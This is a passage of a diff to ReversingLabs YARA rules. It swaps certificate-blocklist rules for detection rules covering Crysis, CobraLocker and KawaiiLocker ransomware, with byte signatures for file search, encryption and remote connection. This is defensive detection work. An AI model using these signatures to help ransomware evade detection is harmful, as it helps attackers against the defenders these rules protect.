7C 24 ?? 73 ?? 8D 4C 24 ?? 83 EC ?? 8B C4 51 E8 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 + 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 DB + 43 53 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 53 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D + 74 24 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 + CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UAB GT-servis" and pe.signatures[i].serial=="07:5d:ca:9c:a8:4b:93:e8:a8:9b:77:51:28:f9:03:02" and 1579305601<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_*)) and ($create_encryption_key) and ($encrypt_encryption_key) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Crysis : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Crysis ransomware." author = "ReversingLabs" - id = "9de11ec8-f408-593c-895f-08dff703ff10" - date = "2023-11-08" - modified = "2023-11-08" + id = "bba2bbf5-ff77-5ec4-ae7f-afae1b564fb7" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3734-L3750" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "622e6ed08ca26908539519f37cf493f8030100bd5e88cb05e851b7d56b0f4c0d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Crysis.yara#L1-L108" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3c9250206f94ac65c1fc24e83cf8cdd76d10066086ef1f34ec14791d237c0263" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Crysis" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_1 = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? + 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 + ?? ?? ?? ?? 66 89 4D ?? 6A ?? FF 15 ?? ?? ?? ?? 66 89 45 ?? 8B 55 ?? 52 FF 15 ?? ?? + ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 83 3C 82 ?? + 74 ?? 8B 4D ?? 0F BF 51 ?? 52 8B 45 ?? 8B 48 ?? 8B 55 ?? 8B 04 91 50 8D 4D ?? 51 E8 + ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A + ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? + 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C3 + } + $enumerate_files = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 33 DB 81 7D ?? ?? ?? ?? ?? 56 57 89 5C 24 ?? + 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? + 57 8B F0 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 6A ?? + 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 56 + FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8D 4C 24 ?? 51 68 + ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? F6 44 24 + ?? ?? 74 ?? 66 83 7C 24 ?? ?? 74 ?? 53 8D 54 24 ?? 52 8B D6 8B CF FF 55 ?? 85 C0 7E + ?? 8B 45 ?? 8B 4D ?? 40 50 53 51 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 53 8D 54 24 ?? 52 + 8B D6 8B CF FF 55 ?? 85 C0 7E ?? FF 44 24 ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? + ?? ?? ?? 85 C0 7F ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 56 6A ?? FF 15 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 + } + $enumerate_resources = { + FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 + ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? + ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B + 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 + ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B + 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D + 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? + 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 + C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 83 7C + 01 ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B + 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 + ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 + E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? + ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? + ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5E 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 8B D8 33 C0 56 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 8B + 45 ?? 6A ?? 50 8D 4D ?? 51 8D 77 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B + D3 83 E2 ?? 2B DA 83 EB ?? 83 C4 ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 50 FF D3 89 45 ?? 83 + F8 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 51 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 81 C2 + ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? A8 ?? 74 ?? 83 E0 ?? 50 8B + 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 + FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 33 C0 + 33 C9 51 50 53 89 45 ?? 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? + ?? 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 53 FF 15 ?? + ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 75 ?? 3B 4D ?? 73 ?? 8B D1 83 E2 ?? B8 ?? ?? + ?? ?? 2B C2 89 45 ?? 57 03 C1 8D 8D ?? ?? ?? ?? 57 51 E8 ?? ?? ?? ?? 8B 4D ?? 03 4D + ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 51 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B + 45 ?? 03 45 ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 + 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B 45 + ?? 83 C4 ?? C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 51 50 56 + C7 47 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 03 F0 01 45 ?? 8B 55 ?? 6A ?? + 52 56 E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 + 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 68 + ?? ?? ?? ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 83 EE ?? 56 E8 ?? ?? ?? + ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 2B F7 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? + 39 75 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 7D + ?? ?? 7E ?? 8B 75 ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 + ?? ?? ?? ?? 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 8B 4D ?? 50 51 + FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures[i].serial=="0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" and 1580722435<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enumerate_resources and $enumerate_files and $encrypt_files and $remote_connection_1) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_9Bd614D5869Bb66C96B67E154D517384 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cobralocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects CobraLocker ransomware." author = "ReversingLabs" - id = "eb42b516-aac6-5bee-af1d-70e0e66700f5" - date = "2023-11-08" - modified = "2023-11-08" + id = "dada6370-3ae3-5931-ba9f-da56ebbcd8c8" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3752-L3770" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d9eea38a1340797cef129b12cf2bb46c444e6f312db7356260f0ac0d9e63183d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara#L1-L59" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "95f4c645c7c237d23b5028f824f78a5f9f8f0a4737b391d877582afe08264d7e" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "CobraLocker" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ?? + ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 + 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 + 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02 + 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ?? + 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ?? + ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD + ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06 + 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A + } + $find_files = { + 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? + ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 + 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? + 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 + FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? + ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? + ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 + ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? + 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? + ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? + 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? + ?? ?? 3A ?? ?? ?? ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"CENTR MBP\"" and (pe.signatures[i].serial=="00:9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" or pe.signatures[i].serial=="9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84") and 1581618180<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_540Cea639D5D48669B7F2F64 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Kawaiilocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects KawaiiLocker ransomware." author = "ReversingLabs" - id = "bfc514b6-43ef-5343-b5f2-d39168ba3e8d" - date = "2023-11-08" - modified = "2023-11-08" + id = "8c368e2d-3c6f-5c4b-880b-ebdb06dcf901" + date = "2020-08-17" + modified = "2020-08-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3772-L3788" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3d3774f10ff9949ea13a7892662438b84b3eb895fc986092649fa9b192170d48" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.KawaiiLocker.yara#L1-L135" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d86b41ef1c43da55869ad26facd5efdf232277f0e33483690a69a04c4ba8f7da" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "KawaiiLocker" + tc_detection_factor = 5 importance = 25 + strings: + $search_files = { + 55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 88 4D ?? 89 55 + ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? + ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 + ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 7D ?? ?? 0F 85 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D + ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D + 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? + FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B C7 83 C8 ?? 3B C7 75 ?? 80 7D ?? ?? 0F 85 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D + ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D + 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? + FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? C3 + } + $remote_connection = { + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 + ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 59 E8 ?? ?? ?? ?? + 8D 4D ?? BA ?? ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 + ?? 8D 4D ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 8D 45 ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 + ?? 8B 50 ?? 